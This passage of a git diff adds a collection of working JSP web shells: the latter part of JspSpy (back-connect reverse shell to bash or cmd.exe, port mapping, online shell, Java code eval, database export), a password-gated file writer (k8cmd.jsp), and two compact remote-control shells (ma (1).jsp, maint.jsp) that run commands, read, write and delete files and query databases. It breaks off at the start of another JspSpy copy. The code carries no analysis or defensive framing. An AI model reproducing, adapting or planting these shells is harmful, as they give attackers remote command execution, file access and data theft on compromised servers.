new DataOutputStream(remoteSoc + .getOutputStream()); + localIn = new DataInputStream(soc + .getInputStream()); + localOut = new DataOutputStream(soc + .getOutputStream()); + StreamConnector.readFromLocal(localIn, + remoteOut); + StreamConnector.readFromRemote(soc, remoteSoc, + remoteIn, localOut); + } catch (Exception ex) { + break; + } + } + } + + }).start(); + JSession.setAttribute("done", "Map Port Success!"); + JSession.setAttribute("localIP", localIP); + JSession.setAttribute("localPort", localPort); + JSession.setAttribute("remoteIP", remoteIP); + JSession.setAttribute("remotePort", remotePort); + JSession.setAttribute(SESSION_O, "vmp"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e; + } + } + } + + //VBackConnect + private static class VbcInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + Object ip = JSession.getAttribute("ip"); + Object port = JSession.getAttribute("port"); + Object program = JSession.getAttribute("program"); + Object done = JSession.getAttribute("done"); + JSession.removeAttribute("ip"); + JSession.removeAttribute("port"); + JSession.removeAttribute("program"); + JSession.removeAttribute("done"); + if (Util.isEmpty(ip)) + ip = request.getRemoteAddr(); + if (Util.isEmpty(port) || !Util.isInteger(port.toString())) + port = "53"; + if (Util.isEmpty(program)) { + if (ISLINUX) + program = "/bin/bash"; + else + program = "cmd.exe"; + } + + if (!Util.isEmpty(done)) + Util.outMsg(out, done.toString()); + out + .println("
" + + "" + + " " + + " " + + " " + "" + "

Back Connect >>

" + + "
" + + " " + + " " + + " " + + " " + + " " + + " " + + " " + " " + "
Your Ip :" + + " " + + " Your Port :" + + " Program To Back :" + + "

" + + " " + + "
" + + "
" + "
" + + "
"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class BackConnectInvoker extends DefaultInvoker { + public boolean doAfter() { + return false; + } + + public boolean doBefore() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String ip = request.getParameter("ip"); + String port = request.getParameter("port"); + String program = request.getParameter("program"); + if (Util.isEmpty(ip) || Util.isEmpty(program) + || !Util.isInteger(port)) + return; + Socket socket = new Socket(ip, Integer.parseInt(port)); + Process process = Runtime.getRuntime().exec(program); + (new StreamConnector(process.getInputStream(), socket + .getOutputStream())).start(); + (new StreamConnector(process.getErrorStream(), socket + .getOutputStream())).start(); + (new StreamConnector(socket.getInputStream(), process + .getOutputStream())).start(); + JSession.setAttribute("done", "Back Connect Success!"); + JSession.setAttribute("ip", ip); + JSession.setAttribute("port", port); + JSession.setAttribute("program", program); + JSession.setAttribute(SESSION_O, "vbc"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e; + } + } + } + + private static class JspEnvInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + out + .println("" + + " " + + " " + " " + + "

System Properties >>

" + + "
" + + "
" + + "
    "); + Properties pro = System.getProperties(); + Enumeration names = pro.propertyNames(); + while (names.hasMoreElements()) { + String name = (String) names.nextElement(); + out.println("
  • " + Util.htmlEncode(name) + " : " + + Util.htmlEncode(pro.getProperty(name)) + "
    • "); + } + out + .println("

System Environment >>

    "); + /* + Map envs = System.getenv(); + Set> entrySet = envs.entrySet(); + for (Map.Entry en:entrySet) { + out.println("
  • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
    • "); + }*/ + out + .println("
"); + } catch (Exception e) { + + throw e; + } + } + } + + private static class ReflectInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + String c = request.getParameter("Class"); + Class cls = null; + try { + if (!Util.isEmpty(c)) + cls = Class.forName(c); + } catch (ClassNotFoundException ex) { + Util.outMsg(out, "Class " + c + + " Not Found ! "); + } + out + .println("
" + + " " + + " " + + " " + + " " + + " " + "

Java Reflect >>

" + + " " + + " " + + " " + + " " + " " + + "
Class Name : " + + "
" + "
" + "
"); + + if (cls != null) { + StringBuffer sb = new StringBuffer(); + if (cls.getPackage() != null) + sb.append("package " + cls.getPackage().getName() + + ";\n"); + String n = null; + if (cls.isInterface()) + n = ""; + //else if (cls.isEnum()) + // n = "enum"; + else + n = "class"; + sb.append(Modifier.toString(cls.getModifiers()) + " " + n + + " " + cls.getName() + "\n"); + if (cls.getSuperclass() != null) + sb + .append("\textends " + + cls.getSuperclass().getName() + + "\n"); + if (cls.getInterfaces() != null + && cls.getInterfaces().length != 0) { + Class[] faces = cls.getInterfaces(); + sb.append("\t implements "); + for (int i = 0; i < faces.length; i++) { + sb + .append("" + + faces[i].getName() + ""); + if (i != faces.length - 1) { + sb.append(","); + } + } + } + sb.append("{\n\t\n"); + sb.append("\t//constructors..\n"); + Constructor[] cs = cls.getConstructors(); + for (int i = 0; i < cs.length; i++) { + Constructor cc = cs[i]; + sb.append("\t" + cc + ";\n"); + } + sb.append("\n\t//fields\n"); + Field[] fs = cls.getDeclaredFields(); + for (int i = 0; i < fs.length; i++) { + Field f = fs[i]; + sb.append("\t" + f.toString() + ";"); + if (Modifier.toString(f.getModifiers()).indexOf( + "static") != -1) { + sb.append("\t//value is : "); + f.setAccessible(true); + Object obj = f.get(null); + sb.append(""); + if (obj != null) + sb.append(obj.toString()); + else + sb.append("NULL"); + + sb.append(""); + } + sb.append("\n"); + } + + sb.append("\n\t//methods\n"); + Method[] ms = cls.getDeclaredMethods(); + for (int i = 0; i < ms.length; i++) { + Method m = ms[i]; + sb.append("\t" + m.toString() + ";\n"); + } + sb.append("}\n"); + String m = "" + + Util.highLight(sb.toString()).replaceAll("\t", + "    ").replaceAll( + "\n", "
") + ""; + Util.outMsg(out, m, "left"); + } + } catch (Exception e) { + throw e; + } + } + } + + private static class TopInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + out + .println("
" + + "" + + " " + + " " + + " " + + " " + + " " + "
JspSpy Ver: 2010" + + request.getHeader("host") + + " (" + + InetAddress.getLocalHost().getHostAddress() + + ") | copy
Logout | " + + " File Manager | " + + " DataBase Manager | " + + " Execute Command | " + + " Shell OnLine | " + + " Back Connect | " + + " Java Reflect | " + + " " + + " Eval Java Code | " + + " Port Scan | " + + " Download Remote File | " + + " ClipBoard | " + + " Port Map | " + + " Others | " + + " JSP Env " + + "
"); + if (JSession.getAttribute(MSG) != null) { + Util.outMsg(out, JSession.getAttribute(MSG).toString()); + JSession.removeAttribute(MSG); + } + if (JSession.getAttribute(ENTER_MSG) != null) { + String outEntry = request.getParameter("outentry"); + if (Util.isEmpty(outEntry) || !outEntry.equals("true")) + Util.outMsg(out, JSession.getAttribute(ENTER_MSG) + .toString()); + } + } catch (Exception e) { + + throw e; + } + } + } + + private static class VOnLineShellInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + out + .println(""); + out + .println("" + + " " + " " + " " + "
"); + out.println("

Shell OnLine »


"); + out + .println("
" + + " " + + " " + + " Notice ! If You Are Using IE , You Must Input Some Commands First After You Start Or You Will Not See The Echo" + + "
" + + "
" + + " " + + "
" + + " " + + " " + + " " + + " Auto Scroll" + + " " + + "
" + + " "); + out.println("
"); + } catch (Exception e) { + throw e; + } + } + } + + private static class OnLineInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String type = request.getParameter("type"); + if (Util.isEmpty(type)) + return; + if (type.toLowerCase().equals("start")) { + String exe = request.getParameter("exe"); + if (Util.isEmpty(exe)) + return; + Process pro = Runtime.getRuntime().exec(exe); + ByteArrayOutputStream outs = new ByteArrayOutputStream(); + response.setContentLength(100000000); + response.setContentType("text/html;charset=" + + System.getProperty("file.encoding")); + OnLineProcess olp = new OnLineProcess(pro); + JSession.setAttribute(SHELL_ONLINE, olp); + new OnLineConnector(new ByteArrayInputStream(outs + .toByteArray()), pro.getOutputStream(), + "exeOclientR", olp).start(); + new OnLineConnector(pro.getInputStream(), response + .getOutputStream(), "exeRclientO", olp).start(); + new OnLineConnector(pro.getErrorStream(), response + .getOutputStream(), "exeRclientO", olp).start(); + Thread.sleep(1000 * 60 * 60 * 24); + } else if (type.equals("ecmd")) { + Object o = JSession.getAttribute(SHELL_ONLINE); + String cmd = request.getParameter("cmd"); + if (Util.isEmpty(cmd)) + return; + if (o == null) + return; + OnLineProcess olp = (OnLineProcess) o; + olp.setCmd(cmd); + } else { + Object o = JSession.getAttribute(SHELL_ONLINE); + if (o == null) + return; + OnLineProcess olp = (OnLineProcess) o; + olp.stop(); + } + } catch (Exception e) { + + throw e; + } + } + } + + private static class EnterInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + PrintWriter out = response.getWriter(); + String type = request.getParameter("type"); + if (!Util.isEmpty(type)) { + JSession.removeAttribute(ENTER); + JSession.removeAttribute(ENTER_MSG); + JSession.removeAttribute(ENTER_CURRENT_DIR); + JSession.setAttribute(MSG, "Exit File Success ! "); + } else { + String f = request.getParameter("filepath"); + if (Util.isEmpty(f)) + return; + JSession.setAttribute(ENTER, f); + JSession + .setAttribute( + ENTER_MSG, + "You Are In File \"" + + f + + "\" Now ! Exit "); + } + response.sendRedirect(SHELL_NAME); + } + } + + private static class VExport2FileInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + PrintWriter out = response.getWriter(); + String type = request.getParameter("type"); + String sql = request.getParameter("sql"); + String table = request.getParameter("table"); + if (Util.isEmpty(sql) && Util.isEmpty(table)) { + JSession.setAttribute(SESSION_O, "vConn"); + response.sendRedirect(SHELL_NAME); + return; + } + out + .println("
" + + "" + + " " + + " " + + " " + + "
" + + " " + + " " + + " " + + " " + + "

Export To File »

" + + " " + + "
Export \"" + + (Util.isEmpty(sql) ? table : sql.replaceAll("\"", + """)) + + "\" To File : " + + " " + + "

" + + BACK_HREF + + "
" + "
"); + } + } + + private static class ExportInvoker extends DefaultInvoker { + public boolean doBefore() { + return false; + } + + public boolean doAfter() { + return false; + } + + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + String type = request.getParameter("type"); + String filepath = request.getParameter("filepath"); + String encode = request.getParameter("encode"); + String sql = null; + DBOperator dbo = null; + dbo = (DBOperator) JSession.getAttribute(DBO); + + if (Util.isEmpty(type)) { + //table export + String tb = request.getParameter("table"); + if (Util.isEmpty(tb)) + return; + String s = dbo.getConn().getMetaData() + .getIdentifierQuoteString(); + sql = "select * from " + s + tb + s; + + } else if (type.equals("queryexp")) { + //query export + sql = request.getParameter("sql"); + if (Util.isEmpty(sql)) { + JSession.setAttribute(SESSION_O, "vConn"); + response.sendRedirect(SHELL_NAME); + return; + } + } + Object o = dbo.execute(sql); + ByteArrayOutputStream bout = new ByteArrayOutputStream(); + byte[] rowSep = "\r\n".getBytes(); + if (o instanceof ResultSet) { + ResultSet rs = (ResultSet) o; + ResultSetMetaData meta = rs.getMetaData(); + int count = meta.getColumnCount(); + for (int i = 1; i <= count; i++) { + String colName = meta.getColumnName(i) + "\t"; + byte[] b = null; + if (Util.isEmpty(encode)) + b = colName.getBytes(); + else + b = colName.getBytes(encode); + bout.write(b, 0, b.length); + } + bout.write(rowSep, 0, rowSep.length); + while (rs.next()) { + for (int i = 1; i <= count; i++) { + String v = null; + try { + v = rs.getString(i); + } catch (SQLException ex) { + v = "<>"; + } + v += "\t"; + byte[] b = null; + if (Util.isEmpty(encode)) + b = v.getBytes(); + else + b = v.getBytes(encode); + bout.write(b, 0, b.length); + } + bout.write(rowSep, 0, rowSep.length); + } + rs.close(); + ByteArrayInputStream input = new ByteArrayInputStream(bout + .toByteArray()); + BufferedOutputStream output = null; + if (!Util.isEmpty(filepath)) { + //export2file + output = new BufferedOutputStream(new FileOutputStream( + new File(filepath))); + } else { + //download. + response.setHeader("Content-Disposition", + "attachment;filename=DataExport.txt"); + output = new BufferedOutputStream(response + .getOutputStream()); + } + byte[] data = new byte[1024]; + int len = input.read(data); + while (len != -1) { + output.write(data, 0, len); + len = input.read(data); + } + bout.close(); + input.close(); + output.close(); + if (!Util.isEmpty(filepath)) { + JSession.setAttribute(MSG, "Export To File Success !"); + response.sendRedirect(SHELL_NAME); + } + } + } + } + + private static class EvalInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + String type = request.getParameter("type"); + PrintWriter out = response.getWriter(); + Object msg = JSession.getAttribute(MSG); + if (msg != null) { + Util.outMsg(out, (String) msg); + JSession.removeAttribute(MSG); + } + if (Util.isEmpty(type)) { + out + .println("" + + " " + + " " + + " " + "

Eval Java Code »

" + + "
" + + "

" + + "

" + + "UpLoad a Class File : "); + Util + .outMsg( + out, + "
"
+										+ "public class SpyEval{\r\n"
+										+ "	static {\r\n"
+										+ "		//Your Code Here.\r\n"
+										+ "	}\r\n" + "}\r\n" + "
", "left"); + out + .println("
" + + "

Jsp Eval :
" + + " " + + " " + + "
" + + "
" + + "

" + + "
"); + } else if (type.equals("jsp")) { + String jspc = request.getParameter("jspc"); + if (Util.isEmpty(jspc)) + return; + File f = new File(SHELL_DIR, "evaltmpninty.jsp"); + BufferedWriter writer = new BufferedWriter( + new OutputStreamWriter(new FileOutputStream(f), "utf-8")); + writer.write(jspc, 0, jspc.length()); + writer.flush(); + writer.close(); + out + .println("" + + " " + + "

Jsp Eval Result »

"); + out + .println("
"); + request.getRequestDispatcher("evaltmpninty.jsp").include( + request, response); + out + .println("
"); + f.delete(); + } + } + } + + private static class EvalUploadInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + ByteArrayOutputStream stream = new ByteArrayOutputStream(); + UploadBean upload = new UploadBean(); + upload.setTargetOutput(stream); + upload.parseRequest(request); + + if (stream.toByteArray().length == 2) { + JSession.setAttribute(MSG, "Please Upload Your Class File ! "); + ((Invoker) ins.get("ev")).invoke(request, response, JSession); + return; + } + SpyClassLoader loader = new SpyClassLoader(); + try { + Class c = loader.defineClass(null, stream.toByteArray()); + c.newInstance(); + } catch (Exception e) { + } + stream.close(); + JSession.setAttribute(MSG, "Eval Java Class Done ! "); + ((Invoker) ins.get("ev")).invoke(request, response, JSession); + } + } + + private static class VOtherInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + PrintWriter out = response.getWriter(); + Object msg = JSession.getAttribute(MSG); + if (msg != null) { + Util.outMsg(out, (String) msg); + JSession.removeAttribute(MSG); + } + out + .println("" + + " " + + " " + + " " + "

Session Manager>>

" + + "
" + + "
    "); + Enumeration en = JSession.getAttributeNames(); + while (en.hasMoreElements()) { + Object o = en.nextElement(); + if (o.toString().equals(MSG)) + continue; + out + .println("
  • " + + o.toString() + + " "); + out + .println(" "); + out + .println(""); + out.println(""); + out.println("
    • "); + } + out + .println("
  • " + + "New Session Attribute" + + "name : value : " + + "
"); + } catch (Exception e) { + throw e; + } + } + } + + //Session Manager + private static class SmInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request, + HttpServletResponse response, HttpSession JSession) + throws Exception { + try { + String type = request.getParameter("type"); + PrintWriter out = response.getWriter(); + if (type.equals("update")) { + String name = request.getParameter("name"); + String value = request.getParameter("value"); + JSession.setAttribute(name, value); + JSession + .setAttribute(MSG, "Update/Add Attribute Success !"); + } else if (type.equals("delete")) { + String name = request.getParameter("name"); + JSession.removeAttribute(name); + JSession.setAttribute(MSG, "Remove Attribute Success !"); + } + ((Invoker) ins.get("vother")).invoke(request, response, + JSession); + } catch (Exception e) { + + throw e; + } + } + } + + static { + ins.put("script", new ScriptInvoker()); + ins.put("before", new BeforeInvoker()); + ins.put("after", new AfterInvoker()); + ins.put("deleteBatch", new DeleteBatchInvoker()); + ins.put("clipboard", new ClipBoardInvoker()); + ins.put("vPortScan", new VPortScanInvoker()); + ins.put("portScan", new PortScanInvoker()); + ins.put("vConn", new VConnInvoker()); + ins.put("dbc", new DbcInvoker()); + ins.put("executesql", new ExecuteSQLInvoker()); + ins.put("vLogin", new VLoginInvoker()); + ins.put("login", new LoginInvoker()); + ins.put("filelist", new FileListInvoker()); + ins.put("logout", new LogoutInvoker()); + ins.put("upload", new UploadInvoker()); + ins.put("copy", new CopyInvoker()); + ins.put("bottom", new BottomInvoker()); + ins.put("vCreateFile", new VCreateFileInvoker()); + ins.put("vEdit", new VEditInvoker()); + ins.put("createFile", new CreateFileInvoker()); + ins.put("vEditProperty", new VEditPropertyInvoker()); + ins.put("editProperty", new EditPropertyInvoker()); + ins.put("vs", new VsInvoker()); + ins.put("shell", new ShellInvoker()); + ins.put("down", new DownInvoker()); + ins.put("vd", new VdInvoker()); + ins.put("downRemote", new DownRemoteInvoker()); + ins.put("index", new IndexInvoker()); + ins.put("mkdir", new MkDirInvoker()); + ins.put("move", new MoveInvoker()); + ins.put("removedir", new RemoveDirInvoker()); + ins.put("packBatch", new PackBatchInvoker()); + ins.put("pack", new PackInvoker()); + ins.put("unpack", new UnPackInvoker()); + ins.put("vmp", new VmpInvoker()); + ins.put("vbc", new VbcInvoker()); + ins.put("backConnect", new BackConnectInvoker()); + ins.put("jspEnv", new JspEnvInvoker()); + ins.put("smp", new SmpInvoker()); + ins.put("mapPort", new MapPortInvoker()); + ins.put("top", new TopInvoker()); + ins.put("vso", new VOnLineShellInvoker()); + ins.put("online", new OnLineInvoker()); + ins.put("enter", new EnterInvoker()); + ins.put("export", new ExportInvoker()); + ins.put("ev", new EvalInvoker()); + ins.put("eu", new EvalUploadInvoker()); + ins.put("vother", new VOtherInvoker()); + ins.put("sm", new SmInvoker()); + ins.put("vExport", new VExport2FileInvoker()); + ins.put("vPack", new VPackConfigInvoker()); + ins.put("reflect", new ReflectInvoker()); + ins.put("portBack", new PortBackInvoker()); + }%> +<% + try { + String o = request.getParameter("o"); + if (Util.isEmpty(o)) { + if (session.getAttribute(SESSION_O) == null) + o = "index"; + else { + o = session.getAttribute(SESSION_O).toString(); + session.removeAttribute(SESSION_O); + } + } + Object obj = ins.get(o); + if (obj == null) { + response.sendRedirect(SHELL_NAME); + } else { + Invoker in = (Invoker) obj; + if (in.doBefore()) { + String path = request.getParameter("folder"); + if (!Util.isEmpty(path) + && session.getAttribute(ENTER) == null) + session.setAttribute(CURRENT_DIR, path); + ((Invoker) ins.get("before")).invoke(request, response, + session); + ((Invoker) ins.get("script")).invoke(request, response, + session); + ((Invoker) ins.get("top")).invoke(request, response, + session); + } + in.invoke(request, response, session); + if (!in.doAfter()) { + return; + } else { + ((Invoker) ins.get("bottom")).invoke(request, response, + session); + ((Invoker) ins.get("after")).invoke(request, response, + session); + } + } + } catch (Exception e) { + Object msg = session.getAttribute(MSG); + if (msg != null) { + Util.outMsg(out, (String) msg); + session.removeAttribute(MSG); + } + if (e.toString().indexOf("ClassCastException") != -1) { + Util.outMsg(out, MODIFIED_ERROR + BACK_HREF); + } + ByteArrayOutputStream bout = new ByteArrayOutputStream(); + e.printStackTrace(new PrintStream(bout)); + session.setAttribute(CURRENT_DIR, SHELL_DIR); + Util.outMsg(out, Util + .htmlEncode(new String(bout.toByteArray())).replaceAll( + "\n", "
"), "left"); + bout.close(); + out.flush(); + ((Invoker) ins.get("bottom")) + .invoke(request, response, session); + ((Invoker) ins.get("after")).invoke(request, response, session); + } +%> diff --git a/jsp/k8cmd.jsp b/jsp/k8cmd.jsp new file mode 100644 index 0000000..966d824 --- /dev/null +++ b/jsp/k8cmd.jsp @@ -0,0 +1,70 @@ + +<%@page contentType="text/html; charset=GBK" import="java.io.*;"%> +<%!private String password="hehe";//޸%> + + +Upload + + +<% +String act=""; +String path=request.getParameter("path"); +String content=request.getParameter("content"); +String url=request.getRequestURI(); +String url2=request.getRealPath(request.getServletPath()); +try +{act=request.getParameter("act").toString();} +catch(Exception e){} +if(request.getSession().getAttribute("hehe")!=null) +{ +if(request.getSession().getAttribute("hehe").toString().equals("hehe")) +{ +if (path!=null && !path.equals("") && content!=null && !content.equals("")) +{ + try{ + File newfile=new File(path); + PrintWriter writer=new PrintWriter(newfile); + writer.println(content); + writer.close(); + if (newfile.exists() && newfile.length()>0) + { + out.println("save ok!"); + }else{ + out.println("save erry!"); + } + }catch(Exception e) + { + e.printStackTrace(); + } +} +out.println("
"); +out.println("

"); +out.println(""+url2+"
"); +out.println("
"); +out.println(""); +out.println("
"); +} +}else{ +out.println("
"); +out.println(""); +out.println(""); +out.println("
"); +}if(act.equals("login")) +{ + String pass=request.getParameter("pass"); + if(pass.equals(password)) + { + session.setAttribute("hehe","hehe"); + String uri=request.getRequestURI(); + uri=uri.substring(uri.lastIndexOf("/")+1); + response.sendRedirect(uri); + }else + { +out.println("Error"); +out.println("go back
"); + } + } + +%> + + \ No newline at end of file diff --git a/jsp/ma (1).jsp b/jsp/ma (1).jsp new file mode 100644 index 0000000..1052f81 --- /dev/null +++ b/jsp/ma (1).jsp @@ -0,0 +1,59 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> +<%! +String Pwd="lincx"; +String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);} +Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance(); +Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;} +void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();} +void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile(); +FileOutputStream os=new FileOutputStream(f);for(int i=0;i<% +String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs); +String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs); +StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|"); +if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}} +else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); +while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();} +else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); +bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);} +else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");} +else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");} +else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c); +MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);} +else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);} +}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString()); +%> \ No newline at end of file diff --git a/jsp/maint.jsp b/jsp/maint.jsp new file mode 100644 index 0000000..f73379b --- /dev/null +++ b/jsp/maint.jsp @@ -0,0 +1,59 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> +<%! +String Pwd="PW"; +String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);} +Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance(); +Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;} +void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();} +void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile(); +FileOutputStream os=new FileOutputStream(f);for(int i=0;i<% +String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs); +String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs); +StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|"); +if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}} +else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); +while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();} +else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); +bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);} +else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");} +else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");} +else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c); +MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);} +else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);} +}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString()); +%> \ No newline at end of file diff --git a/jsp/myxx1.jsp b/jsp/myxx1.jsp new file mode 100644 index 0000000..de4182d --- /dev/null +++ b/jsp/myxx1.jsp @@ -0,0 +1,4201 @@ +<%@page pageEncoding="utf-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.lang.reflect.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.util.jar.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%!private static final String PW = "apple"; //password + private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; + private static final String REQUEST_CHARSET = "ISO-8859-1"; + private static final String PAGE_CHARSET = "UTF-8"; + private static final String CURRENT_DIR = "currentdir"; + private static final String MSG = "SHOWMSG"; + private static final String PORT_MAP = "PMSA"; + private static final String DBO = "DBO"; + private static final String SHELL_ONLINE = "SHELL_ONLINE"; + private static final String ENTER = "ENTER_FILE"; + private static final String ENTER_MSG = "ENTER_FILE_MSG"; + private static final String ENTER_CURRENT_DIR = "ENTER_CURRENT_DIR"; + private static final String SESSION_O = "SESSION_O"; + private static String SHELL_NAME = ""; + private static String WEB_ROOT = null; + private static String SHELL_DIR = null; + public static Map ins = new HashMap(); + private static boolean ISLINUX = false; + + private static final String MODIFIED_ERROR = "JspSpy Was Modified By Some Other Applications. Please Logout."; + private static final String BACK_HREF = " Back"; + + private static class MyRequest extends HttpServletRequestWrapper { + public MyRequest(HttpServletRequest req) { + super(req); + } + + public String getParameter(String name) { + try { + String value = super.getParameter(name); + if (name == null) + return null; + return new String(value.getBytes(REQUEST_CHARSET), PAGE_CHARSET); + } catch (Exception e) { + return null; + } + } + } + + private static class SpyClassLoader extends ClassLoader { + public SpyClassLoader() { + } + + public Class defineClass(String name, byte[] b) { + return super.defineClass(name, b, 0, b.length - 2); + } + } + + private static class DBOperator { + private Connection conn = null; + private Statement stmt = null; + private String driver; + private String url; + private String uid; + private String pwd; + + public DBOperator(String driver, String url, String uid, String pwd) + throws Exception { + this(driver, url, uid, pwd, false); + } + + public DBOperator(String driver, String url, String uid, String pwd, + boolean connect) throws Exception { + Class.forName(driver); + if (connect) + this.conn = DriverManager.getConnection(url, uid, pwd); + this.url = url; + this.driver = driver; + this.uid = uid; + this.pwd = pwd; + } + + public void connect() throws Exception { + this.conn = DriverManager.getConnection(url, uid, pwd); + } + + public Object execute(String sql) throws Exception { + if (isValid()) { + stmt = conn.createStatement(); + if (stmt.execute(sql)) { + return stmt.getResultSet(); + } else { + return "" + stmt.getUpdateCount(); + } + } + throw new Exception("Connection is inValid."); + } + + public void closeStmt() throws Exception { + if 